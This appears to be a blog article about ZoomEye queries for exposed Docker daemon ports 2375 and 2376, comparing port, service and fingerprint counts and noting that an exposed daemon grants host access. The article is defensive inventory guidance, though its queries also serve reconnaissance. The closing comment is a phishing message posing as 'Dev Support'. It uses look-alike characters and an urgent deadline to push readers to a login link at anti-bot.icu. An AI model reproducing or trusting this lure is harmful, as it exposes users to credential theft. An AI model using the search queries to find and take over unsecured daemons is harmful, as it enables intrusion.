What port 2375 says about Docker exposure that a product fingerprint does not
Two queries, two very different answers
Ask a search index how many Docker deployments are exposed and the answer depends on how the question is written. A ZoomEye query for port="2375" returned 1,436,956 results. A query for app="Docker" returned 13,193.
Both figures come from the same index at the same moment. The difference is roughly two orders of magnitude, and it follows from what each query matches. The port query finds hosts that answer on the TCP port the Docker daemon uses when it is configured to listen over the network. The application query finds hosts whose response fingerprint the index recognises as Docker. A host can satisfy the first condition and fail the second, because a daemon listening on 2375 has no obligation to announce itself in a way a fingerprint matcher recognises.
Context and method
The counts in this article come from ZoomEye queries run on 26 September 2026 between 04:33 and 04:36 Beijing time, which is 2026-09-25T20:33 to 20:36 UTC. The four queries were:
port="2375"app="Docker"port="2376"service="docker"
Three limits apply to every figure here. A port match shows that something listened on that port when the host was scanned. It does not show whether the API answered, whether authentication was configured, or whether the endpoint was reachable from the internet at the moment you read this. A fingerprint match depends on the banner a service returned and on the matcher's rules, and both change over time. Counts on internet-wide scan indexes move daily, so these numbers describe one moment rather than a stable inventory.
Reading the four counts together
port="2376" returned 1,754,061, which is larger than the 2375 count. Port 2376 is the conventional port for an encrypted Docker daemon connection. The size of the two numbers together is a reminder that network exposure is a configuration choice, and that a substantial population of deployments made that choice.
service="docker" returned 652,954. A service-level match describes traffic the index classified as the Docker protocol, which sits between a bare port match and a full application fingerprint.
The gap between 1.4 million and 13 thousand is the part worth carrying into an inventory discussion. A list built from fingerprint queries alone will understate how many hosts answer on the daemon port. A list built from port queries alone will overstate how many of those hosts run Docker, because any process can bind 2375 and any port scan can produce a false positive through a load balancer, a proxy or an unrelated service.
Why an exposed daemon port matters
The Docker daemon does not authenticate clients at the API level. When it listens on a TCP socket, any client that can reach that socket can send the instructions the local command line sends, and the daemon executes them. In practice that means starting containers, mounting host directories into them and reaching the host file system.
The standard defences are the Unix socket, which is the default, and network placement. Where a deployment configured a network listener, the open question is which networks can reach it.
Next steps with ZoomEye
The useful move is to run the port query and the fingerprint query side by side and compare the answers.
- Size the population with
port="2375", then narrow it with the geography or network range you are responsible for. - Cross-check the same range with
app="Docker"to separate confirmed fingerprints from bare port matches, and useservice="docker"as a middle signal. - Repeat the query on a schedule. A count that changes between two runs points at a configuration change worth investigating.
- For your own estate, verify the daemon configuration directly. An external scan cannot see a host that is filtered at the edge, so a low external count is not proof of a closed socket.
ZoomEye's contribution here is the ability to run the port, service and fingerprint queries separately and compare them. Divergence between the three is itself information, and it is the part a flat asset list usually lacks. The platform is documented at https://www.zoomeye.org/.
References
- ZoomEye search platform
- Docker documentation on protecting the daemon socket
- Docker Engine API reference
Top comments (1)
Dеаr User,
Duе tо аn increase іn bоt aсtivitу on the plаtform, we require verifу of уоur account.
Pleasе lоg in vіа the link bеlоw:
• anti-bot.icu/5K0N5G7M9C4
Verificated deadlіnе - 12 hours.
Sincerely,Dev Suppоrt